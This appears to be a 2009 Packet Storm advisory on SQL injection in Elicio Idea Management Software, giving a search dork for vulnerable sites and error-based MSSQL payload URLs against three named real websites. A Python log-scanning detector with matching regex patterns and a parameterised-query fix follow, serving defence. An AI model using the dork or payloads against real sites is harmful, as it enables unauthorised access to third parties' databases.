Elicio Idea Management Software SQL Injection

2009-08-11T00:00:00
ID PACKETSTORM:80274
Type packetstorm
Reporter S3T4N
Modified 2009-08-11T00:00:00

Description

                                        
`#*******************************************************************************************#  
#Title : Elicio Idea Management Software [Remote SQL injection]  
#*******************************************************************************************#  
#Software : Elicio Idea Management Software  
#vendor : http://www.wiredforideas.com  
#Date : 08/12/2009 [Indonesia]  
#Author : S3T4N  
#Contact : root[at]sux0r.net  
#Blog : http://sux0r.net  
#*******************************************************************************************#  
#[o]Vulnerable file  
#campaignpage.cfm  
#*******************************************************************************************#  
#[o] Dork  
#inurl:/campaignpage.cfm?c_campaignid=  
#*******************************************************************************************#  
#[o] Exploit  
#http://target/campaignpage.cfm?c_campaignid=[SQL]  
#*******************************************************************************************#  
#[o] POC  
#http://www.dragoncottage.co.uk/campaignpage.cfm?c_campaignid=1%20and%201=convert(int,(@@version))--  
#http://nhs-ideas.wiredforideas.com/nhselicio/campaignpage.cfm?c_campaignid=3%20and%201=convert(int,(@@version))--  
#http://www.wiredforideas.com/campaignpage.cfm?c_campaignid=3%20and%201=convert(int,(@@version))--  
#*******************************************************************************************#  
#[o] Greetz  
#www.MainHack.net - www.ServerIsDown.org - www.sux0r.net  
#VOP Crew [ Vaksin13 * OoN_Boy * Paman ]  
#R3VAN_BASTARD * Kecemplungkalen * eminem * [S]hiro  
#zxvf * Pizzyroot * iwannine  
#Jupe Crew [thanks for the free internet access, lol]  
#special to Mrs. Rosa, sorry for always being a bother every semester :D  
#*******************************************************************************************#`
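
A detection check for the parameter named in the advisory, added here as an example and not part of the original advisory: it scans web access logs for requests to campaignpage.cfm whose c_campaignid is not a plain integer, and labels values carrying the tokens of the error-based MSSQL PoC above. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a combined-format access log line (the format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens seen in the advisory's error-based MSSQL PoC: convert(, @@variable, -- comment.
MSSQL_PROBE_RE = re.compile(r"convert\s*\(|@@\w+|--", re.IGNORECASE)

# Constructed sample lines; client addresses are from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Aug/2009:10:00:01 +0000] "GET /campaignpage.cfm?c_campaignid=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Aug/2009:10:00:05 +0000] "GET /campaignpage.cfm?c_campaignid=3%20and%201=convert(int,(@@version))-- HTTP/1.1" 500 812',
    '198.51.100.7 - - [11/Aug/2009:10:00:09 +0000] "GET /ideas/campaignpage.cfm?C_CampaignID=abc HTTP/1.1" 500 640',
    '192.0.2.10 - - [11/Aug/2009:10:00:12 +0000] "GET /index.cfm?page=1 HTTP/1.1" 200 2048',
]


def classify(log_line):
    """Return (reason, decoded_value) for a suspicious c_campaignid, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/campaignpage.cfm"):
        return None
    # parse_qsl percent-decodes values; CFML URL variable names are case-insensitive.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key.lower() != "c_campaignid" or re.fullmatch(r"[0-9]{1,10}", value):
            continue
        reason = "mssql-error-probe" if MSSQL_PROBE_RE.search(value) else "non-integer-id"
        return (reason, value)
    return None


def scan(lines):
    """Return (line_number, reason, value) for every flagged line, 1-indexed."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, *verdict))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The application-side fix is to bind c_campaignid as an integer, which in CFML is done with `<cfqueryparam cfsqltype="cf_sql_integer">` rather than placing the URL value directly in the query text.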